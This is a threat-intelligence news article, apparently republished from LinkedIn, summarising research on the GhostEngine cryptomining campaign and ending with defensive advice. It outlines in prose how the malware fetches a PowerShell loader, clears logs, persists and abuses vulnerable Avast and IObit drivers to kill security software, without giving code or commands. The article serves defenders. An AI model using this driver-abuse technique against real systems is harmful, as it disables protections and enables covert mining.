GhostEngine: How Hackers Mine Cryptocurrency Using Avast Drivers
In a recent development, security experts from Elastic Security Labs and Antiy have uncovered a sophisticated cryptocurrency mining campaign named REF4578. This campaign employs the malicious software GhostEngine, which leverages vulnerable drivers to disable antivirus programs and initiate the XMRig miner.
Elastic Security Labs and Antiy highlighted the complexity of this attack in their reports. They have shared threat detection rules to aid defenders in identifying and halting such attacks. However, the reports do not link the activity to any known hacker groups or provide details about the victims, leaving the origin and scale of the campaign unclear.
How GhostEngine Operates
The exact method hackers use to breach servers remains unknown. The attack begins with the execution of a file named Tiworker.exe, which masquerades as a legitimate Windows file. This executable is the initial stage of deploying GhostEngine, a PowerShell script designed to download various modules onto the infected device.
Once executed, Tiworker.exe downloads a script named get.png from a C2 server, serving as the primary loader for GhostEngine. The PowerShell script then downloads additional modules and their configurations, disables Windows Defender, enables remote services, and clears various Windows event logs.
The script checks for at least 10MB of free disk space before proceeding with the infection and creates scheduled tasks to maintain the persistence of the threat. It then downloads and executes smartsscreen.exe, the main payload of GhostEngine. This malware disables and removes EDR solutions and launches XMRig for cryptocurrency mining.
To disable protection programs, GhostEngine downloads two vulnerable drivers: aswArPots.sys (an Avast driver) to terminate EDR processes, and IObitUnlockers.sys (an Iobit driver) to delete related executables.
领英推荐
Defense Measures Against GhostEngine
Elastic's experts recommend that defenders pay close attention to suspicious PowerShell executions, unusual process activities, and network traffic indicative of connections to cryptocurrency pools. The use of vulnerable drivers and the creation of related kernel services should also raise red flags.
A preventive measure is to block the creation of files by vulnerable drivers like aswArPots.sys and IobitUnlockers.sys. Elastic Security has also provided YARA rules in their report to help defenders identify GhostEngine infections.
Although researchers did not find significant sums associated with the single payment ID they studied, it is possible that each affected user has a unique wallet, and the overall financial impact could be substantial.